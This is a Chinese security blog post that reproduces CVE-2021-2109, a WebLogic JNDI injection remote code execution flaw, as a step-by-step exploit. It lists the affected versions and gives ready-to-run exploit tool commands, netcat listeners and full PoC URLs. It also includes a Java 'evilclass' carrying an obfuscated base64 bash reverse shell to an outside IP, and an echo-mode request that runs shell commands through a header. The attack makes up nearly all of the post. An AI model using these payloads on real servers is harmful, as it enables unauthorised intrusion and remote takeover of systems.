c1ay's blog

weblogic cve-2021-2109 jndi注入 远程代码执行复现

漏洞复现
字数统计: 450阅读时长: 2 min
2021/01/22 Share

影响版本

Weblogic Server 10.3.6.0.0
Weblogic Server 12.1.3.0.0
Weblogic Server 12.2.1.3.0
Weblogic Server 12.2.1.4.0
Weblogic Server 14.1.1.0.0

利用方式一:无回显利用-反弹shell

1、工具github地址:
https://github.com/welk1n/JNDI-Injection-Exploit/releases

vps上执行:

1
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "反弹shell的命令" -A "vpsip"

mark

vps监听端口:

1
nc -nvlp 8888

poc:

1
http://192.168.157.189:49163/console/css/%252E%252E%252Fconsolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://4x.xxx.xxx;xxx:1389/01hohc;AdminServer%22)

反弹成功

mark

2、也可以直接通过marshalsec-0.0.3-SNAPSHOT-all.jar这个工具进行复现:

vps上执行:

启动JNDI服务

1
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://vpsip:8080/#evilclass

启动HTTPServer:

1
python -m SimpleHTTPServer 8080

http目录下放置恶意class文件,evilclass.class源码如下: 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
import java.lang.Runtime;
import java.lang.Process;   
public class evilclass {    
    public evilclass() {
        try{
            String commands = "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDUuMTg2LjE0Ni84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}";
            Process pc = Runtime.getRuntime().exec(commands);
            pc.waitFor();
        } catch(Exception e){
            e.printStackTrace();
        }   
    }   
    public static void main(String[] argv) {
        evilclass e = new evilclass();
    }   
}

vps监听端口:

1
nc -nvlp 8888

poc:

1
http://192.168.157.189:49163/console/css/%252E%252E%252Fconsolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://4x.xxx.xxx;xxx:1389/evilclass;AdminServer%22)

mark

mark

mark

利用方式二:回显利用

工具github地址:
https://github.com/feihong-cs/JNDIExploit/releases/

vps上执行:

1
java -jar JNDIExploit-v1.11.jar -i vpsip

mark

poc:

1
2
3
4
5
6
7
8
9
GET /console/css/%252E%252E%252Fconsolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://4x.xxx.xxx;xxx:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1
Host: 192.168.157.189:49163
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
cmd: whoami

mark

原文作者:c1ay

原文链接:https://c1aysec.github.io/2021/01/22/weblogic cve-2021-2109 jndi注入 远程代码执行复现/

发表日期:January 22nd 2021, 1:06:33 am

更新日期:January 25th 2021, 12:17:09 pm

版权声明:本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

CATALOG
  1. 1. 影响版本
  2. 2. 利用方式一:无回显利用-反弹shell
  3. 3. 利用方式二:回显利用
Total : 63
2018
Invalid date
2021
2020
2019
2018
Invalid date
2018
Invalid date
2017
Invalid date
2017
Invalid date
Invalid date
Invalid date
Invalid date
Invalid date
Invalid date
Invalid date
2017
Invalid date
Invalid date
Invalid date
ctf 漏洞复现 漏洞分析 代码审计 漏洞挖掘 Hexo python 算法 免杀学习 Linux sql注入 渗透测试 反弹shell ssrf 文件上传
ctf 漏洞复现 漏洞分析 代码审计 web安全 漏洞挖掘 其他 python编程 免杀学习 Linux渗透 渗透测试